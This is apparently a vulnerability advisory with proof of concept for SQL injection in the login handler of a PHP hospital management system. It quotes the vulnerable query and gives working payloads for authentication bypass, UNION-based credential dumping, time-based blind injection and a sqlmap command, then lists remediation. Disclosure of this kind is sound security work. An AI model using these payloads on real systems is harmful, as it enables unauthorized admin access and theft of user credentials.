## https://sploitus.com/exploit?id=ECD019AB-4224-5E31-BC99-E65B9C429640
# Online Hospital Management System has SQL Injection vulnerability in login_1.php
## Supplier
https://code-projects.org/online-hospital-management-system-in-php-with-source-code/
## Vulnerability file
text
```
login_1.php
```
## describe
In `login_1.php`, there is a critical SQL injection vulnerability in the Online Hospital Management System. The controllable parameter is `username` (sent via HTTP POST method). This parameter is directly concatenated into a SELECT SQL query without any sanitization or parameterized query protection. Because `login_1.php` is the login handler and does not require prior authentication, the vulnerability can be triggered by **any unauthenticated remote attacker**. A malicious attacker can bypass authentication entirely, log in as any user (including administrators), or extract sensitive data from the database using UNION or blind SQL injection techniques.
**Code analysis**
The vulnerable code resides on line 10 of `login_1.php`:
php
```
$username=$_POST['username'];
$password=$_POST['password'];
$user=$_POST['user'];
$sql="select * from login_user where username='$username'";
$query=mysqli_query($db,$sql);
```
The `$_POST['username']` value is taken directly from the login form and inserted into the SQL query string without any escaping or use of a prepared statement. The application then checks if a row is returned and subsequently validates the password and user role in PHP. However, an attacker can inject malicious SQL code into the `username` field to manipulate the query's logic or retrieve arbitrary data.
## POC
### 1. Authentication Bypass (Universal Login)
Submit the following as the `username` to bypass authentication and log in as the first user in the database (typically the admin):

```
' OR '1'='1' LIMIT 1 -- -
```
With the password and user type set to any values (e.g., `password=123`, `user=admin`), the resulting SQL becomes:
sql
```
select * from login_user where username='' OR '1'='1' LIMIT 1 -- '
```
This query returns the first row from the `login_user` table. If the attacker sets the `user` parameter to `admin`, the PHP logic `if($fetch['user']==$user && $fetch['user']=='admin')` will succeed, granting immediate administrative access and redirecting to `../index_1.php`.
### 2. Authentication Bypass Targeting a Specific User
To log in as a specific user (e.g., `admin`) without knowing the password:
text
```
admin' -- -
```
The query becomes:
sql
```
select * from login_user where username='admin' -- '
```
This bypasses any password check because the password validation is done in PHP after the SQL query. The attacker simply needs to know or guess a valid username.
### 3. Union-Based Data Extraction

The login page does not directly display data, but an attacker can use error-based or union-based techniques if error reporting is enabled (as it often is in this application via `mysqli_error` calls on other pages).
**Determine number of columns (typically 4 or more):**
text
```
' UNION SELECT 1,2,3,4 -- -
```
Gradually increase columns until no error occurs. Assuming the `login_user` table has at least 4 columns (e.g., `id`, `username`, `password`, `user`), the payload above will work.
**Extract database name and version:**
text
```
' UNION SELECT 1,database(),version(),4 -- -
```
**Dump usernames and passwords from `login_user`:**
text
```
' UNION SELECT 1,group_concat(username,':',password),3,4 FROM login_user -- -
```
This will cause an SQL error visible on the page (if errors are displayed), revealing all credentials.
### 4. Time-Based Blind SQL Injection
If all errors are suppressed, time-based injection can verify the vulnerability:
text
```
' AND SLEEP(5) -- -
```
A 5-second delay before the server responds confirms that SQL code is being executed.
### 5. Automated Exploitation with sqlmap
Save the POST request (including `username`, `password`, and `user` fields) to a file `login_request.txt` and run:
text
```
sqlmap -r login_request.txt -p username --level 3 --batch
```
sqlmap will automatically exploit the injection and can dump the entire database, including all user credentials.


## Impact
Successful exploitation allows an attacker to:
- **Bypass authentication completely** and log in as any user without a password
- **Gain administrative access** by logging in as an admin account
- **Extract all usernames and passwords** from the `login_user` table, leading to full credential compromise
- **Access sensitive data** from other database tables via UNION or blind injection
- **Potentially write files or execute commands** on the server, depending on MySQL user privileges and configuration (e.g., `INTO OUTFILE`)
## Remediation
1. **Use Prepared Statements** for all database queries involving user input:
php
```
$stmt = $db->prepare("SELECT * FROM login_user WHERE username = ?");
$stmt->bind_param("s", $_POST['username']);
$stmt->execute();
$result = $stmt->get_result();
$check = $result->num_rows;
if ($check > 0) {
$fetch = $result->fetch_assoc();
// proceed with password verification and role check
}
```
1. **Implement Input Validation** โ restrict the `username` field to alphanumeric characters and expected lengths only. For example:
php
```
if (!preg_match('/^[a-zA-Z0-9_]{3,20}$/', $_POST['username'])) {
die("Invalid username format");
}
```
1. **Store Passwords Securely** โ use `password_hash()` and `password_verify()` instead of comparing plaintext passwords.
2. **Add Rate Limiting and Account Lockout** to prevent brute-force attacks and automated exploitation.
3. **Disable Detailed Error Messages** in production โ display a generic "Invalid username or password" message regardless of the actual error. This prevents attackers from gaining feedback during injection attacks.
4. **Apply Least Privilege Principle** โ the MySQL user used by the application should have only the necessary permissions (no FILE privilege, no access to `mysql` schema, etc.).